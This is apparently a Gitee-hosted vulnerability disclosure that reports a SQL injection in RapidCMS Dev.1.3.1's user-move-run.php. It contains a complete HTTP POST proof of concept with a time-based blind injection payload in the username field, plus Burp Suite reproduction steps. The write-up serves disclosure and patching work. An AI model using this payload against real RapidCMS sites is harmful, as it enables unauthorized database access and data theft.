1 Star 0 Fork 0

0kooo/cve_article

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
rapidcms user-move-run.php SQL injection.md 3.06 KB
一键复制 编辑 原始数据 按行查看 历史

Description of the vulnerability

RapidCMS Dev.1.3.1 found a SQL injection vulnerability in /admin/user/user-move-run.php

System situation

version

RapidCMS Dev.1.3.1

Project address

https://github.com/OpenRapid/rapidcms

POC

Parameters affected: username

POST /admin/user/user-move-run.php HTTP/1.1
Host: demo.com
Content-Length: 71
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://demo.com/admin/user/user-move.php?username=admin
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: deviceid=1722062988348; xinhu_ca_rempass=0; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1723172185; csrf_358693=2df7a84f; SECKEY_ABVK=OwAgykiuZ90JyymTDay7TVxsu9K7i77SDQ1wYucKShE%3D; BMAP_SECKEY=zsabggfKizJ7RMP-whUACbv-8Y8e5RtMYzyqN6tgzDDcqlIgvjPYXLThdapgeYvMI5gtvLD423X1mOjreODpLfh2LBSqd-MfWUOnirBpX6X5MhDcI2h78cg9SCeZlworW5OtN5Li7126gdR5a9n2B0G1H09Eu9K-e5yMSsxdwbkojLGWbNKpJSNGySLmO3bA; lang=zh-cn; vision=rnd; device=desktop; theme=default; hideMenu=false; preExecutionID=3; executionTaskOrder=status%2Cid_desc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1723680035; http304ok=1; qebak_loginlangid=1; csrf_f2b6b4=adc34ccd; downloading=null; storyModuleParam=0; storyProductParam=0; storyBranchParam=0; executionStoryOrder=order_desc; storyPreExecutionID=3; docSpaceParam=%7B%22type%22%3A%22execution%22%2C%22objectID%22%3A%223%22%2C%22libID%22%3A%227%22%2C%22moduleID%22%3A%220%22%2C%22browseType%22%3A%22%22%2C%22param%22%3A%220%22%7D; lastDocModule=0; lastProject=2; docFilesViewType=list; tab=doc; xinhu_ca_adminuser=admin; xinhu_mo_adminid=eg0el0gx0ttm0tut0et0mx0ml0ea0el0tuj0tuj0ee0tua0ew0mg09; user=Y4W4R2t0a9Wa46O0O0Oa; name=admin; admin=Y4W4R2t0a9Wa46O0O0Oa
Connection: keep-alive

username=' or if(length(database())>4,sleep(3),1)#&password=123456&sub=

analyse

  1. Find the file with vulnerabilities

输入图片说明

It is found that the username parameter is directly passed in through the post method and concatenated with the SQL statement.

It is then executed via the mysqli_query() function

Repetition

  1. Find the location where the user's password is changed

输入图片说明

  1. Enter the password and click Modify, before that, you need to turn on the packet capture function of Burp Suite. Facilitate subsequent modifications.

输入图片说明

  1. Fix username parameter as ' or if(length(database())>4,sleep(3),1)# and then put the package.

输入图片说明

Loading...
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
1
https://gitee.com/A0kooo/cve_article.git
git@gitee.com:A0kooo/cve_article.git
A0kooo
cve_article
cve_article
master

搜索帮助